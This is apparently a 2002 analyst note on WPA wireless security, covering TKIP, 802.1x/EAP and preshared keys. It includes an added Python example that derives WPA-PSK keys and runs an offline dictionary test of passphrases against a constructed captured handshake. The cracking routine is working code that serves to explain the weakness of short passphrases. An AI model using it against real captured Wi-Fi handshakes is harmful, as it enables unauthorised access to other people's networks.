Use WPA to improve wireless LAN security



On 31 October 2002, the Wi-Fi Alliance (a nonprofit body that certifies IEEE 802.11 products) announced Wi-Fi Protected Access (WPA), an interim security specification drawn from the draft IEEE 802.11i standard. WPA replaces WEP, runs on existing hardware and will likely appear in Wi-Fi-certified products in 1Q03; most vendors are expected to offer firmware and driver updates for products already in the field.

First Take

The Wi-Fi Alliance has responded to the security vulnerabilities in WEP, the encryption defined in the original 802.11 specification. WPA brings forward two pieces of the draft 802.11i standard ahead of its final approval: Temporal Key Integrity Protocol (TKIP) encryption and 802.1x/Extensible Authentication Protocol (EAP) authentication. TKIP keeps WEP's RC4 cipher so that it can run on existing hardware, but removes the static-key weakness that made WEP vulnerable: it mixes a fresh per-packet key from a per-session temporal key, adds a sequence counter so that replayed frames are rejected, and appends a message integrity check (Michael) so that forged frames are detected. Session keys are changed frequently rather than configured once, and the result is adequate encryption and authentication for most enterprise requirements. 802.1x/EAP authenticates the client to the network and, with EAP methods that also authenticate the server (EAP-TLS or PEAP, for example), the network to the client; this mutual authentication defeats "man in the middle" attacks in which an intruder masquerades as an access point to capture credentials.

WPA works with RADIUS, Kerberos and other authentication servers, which many large enterprises already use. (Most vendors, though, have implemented support only for RADIUS in their access points.) For smaller enterprises, WPA offers a "preshared key" (PSK) option in which a passphrase is configured manually in the access point and on every client, removing the need for an authentication server. The passphrase, combined with the network name (SSID), is turned into a master key from which the per-session TKIP keys are derived, so the radio link gets the same encryption and integrity protection as in the 802.1x mode. The trade-off is that the link is only as secure as the passphrase: everyone who knows it shares the master key, and an attacker who records a client joining the network can test candidate passphrases offline against that recording. Short or dictionary passphrases should therefore be avoided, and the passphrase should be changed whenever someone who knows it leaves.
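The derivation described above, carried through from passphrase to session keys, as an added example (not Gartner's or the Wi-Fi Alliance's code). It follows the key hierarchy in IEEE 802.11i, which WPA adopted: the passphrase and SSID give a 256-bit Pairwise Master Key (PMK) via PBKDF2-HMAC-SHA1 with 4096 iterations, and the PMK plus the two MAC addresses and two nonces exchanged when a client joins give the 512-bit Pairwise Transient Key (PTK) that holds the TKIP keys. It goes one step beyond the text to show the practitioner's caveat: because the MACs, nonces and a keyed integrity check (Key MIC) are all visible in that exchange, a recorded join lets an attacker test passphrases offline. The SSID, MAC addresses, nonces, candidate list and the EAPOL frame are constructed sample data, not a real capture.

```python
"""WPA-PSK key hierarchy (IEEE 802.11i) and an offline passphrase test.

Added illustration; the constants below are constructed sample data.
"""
import hashlib
import hmac


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits).
    # A WPA passphrase is 8-63 printable ASCII characters.
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter) for
    # counter = 0, 1, ..., concatenated and truncated to nbytes.
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    # AA is the access point MAC, SPA the client MAC; the nonces are sent in the clear.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def split_tkip_ptk(ptk: bytes) -> dict:
    # TKIP PTK layout: KCK (16) | KEK (16) | TK (16) | MIC tx key (8) | MIC rx key (8)
    return {"KCK": ptk[0:16], "KEK": ptk[16:32], "TK": ptk[32:48],
            "MIC_TX": ptk[48:56], "MIC_RX": ptk[56:64]}


def eapol_mic_tkip(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    # WPA/TKIP key descriptor (version 1): Key MIC = HMAC-MD5(KCK, frame with MIC field zeroed)
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.md5).digest()


def offline_passphrase_guess(ssid, aa, spa, anonce, snonce,
                             eapol_frame_mic_zeroed, captured_mic, candidates):
    # Everything here except the passphrase is visible to an eavesdropper, so each
    # candidate can be checked without sending a single frame to the network.
    for cand in candidates:
        ptk = wpa_ptk(wpa_psk_pmk(cand, ssid), aa, spa, anonce, snonce)
        mic = eapol_mic_tkip(split_tkip_ptk(ptk)["KCK"], eapol_frame_mic_zeroed)
        if hmac.compare_digest(mic, captured_mic):
            return cand
    return None


# Constructed sample "capture" (hypothetical values, not real traffic).
SSID = "CorpWLAN"
TRUE_PASSPHRASE = "correcthorse"          # configured on AP and clients; never sent
AP_MAC = bytes.fromhex("001122334455")    # AA
STA_MAC = bytes.fromhex("66778899aabb")   # SPA
ANONCE = bytes(range(32))                 # from message 1 of the key exchange
SNONCE = bytes(range(32, 64))             # from message 2
# Message 2 body with its 16-byte Key MIC field zeroed (layout simplified).
EAPOL_FRAME_MIC_ZEROED = b"\x01\x03\x00\x5f\xfe\x01\x09\x00\x20" + b"\x00" * 8 + SNONCE + b"\x00" * 54
# What the genuine client put in the MIC field; the attacker reads this off the air.
CAPTURED_MIC = eapol_mic_tkip(
    split_tkip_ptk(wpa_ptk(wpa_psk_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE))["KCK"],
    EAPOL_FRAME_MIC_ZEROED)


def demo_offline_guess():
    # Dictionary test against the captured handshake; returns the passphrase if found.
    candidates = ["password", "letmein123", "CorpWLAN2002", TRUE_PASSPHRASE]
    return offline_passphrase_guess(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                    EAPOL_FRAME_MIC_ZEROED, CAPTURED_MIC, candidates)


if __name__ == "__main__":
    # 802.11i test vector: passphrase "password", SSID "IEEE"
    print("PMK:", wpa_psk_pmk("password", "IEEE").hex())
    print("recovered passphrase:", demo_offline_guess())
```

The 4096 PBKDF2 iterations slow each guess down, but not enough to protect a passphrase that appears in a word list; the cost per candidate is fixed by the standard, so the only defence on the PSK side is passphrase length and randomness. `wpa_psk_pmk("password", "IEEE")` reproduces the published 802.11i test vector, which is a useful sanity check for any implementation of this derivation.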

TKIP, 802.1x and EAP are not new; the significance of this announcement is that the Wi-Fi Alliance will begin certifying WPA products in February 2003. Certification testing will ensure interoperability and remove another barrier to viable multivendor WLANs. According to the Wi-Fi Alliance, WPA will be mandatory for Wi-Fi certification before the end of 2003, and eventually products will have to ship with WPA turned on. These requirements will go a long way toward resolving the most common WLAN security risk: equipment left in, or reverting to, an insecure default mode.

WPA will arrive as firmware and software upgrades for Wi-Fi-certified products. Gartner recommends that enterprises currently relying on WEP alone install WPA as soon as it is available.

Analytical Sources: Andy Rolfe, Ken Dulaney and John Pescatore, Gartner Research

Recommended Reading and Related Research

“Securing Public WLANs: VPNs Won’t Solve Everything” – Open hot spot networks expose a PC to hacker attacks, including exposed drive shares and port-based attacks; personal firewalls are critical safety mechanisms. By Martin Reynolds

“Three False Remote-Access Security Assumptions” – Enterprises must anticipate vulnerabilities – such as unauthorized remote access, rogue WLAN access points and undervalued and unguarded information – and take appropriate, preventive measures. By John Girard
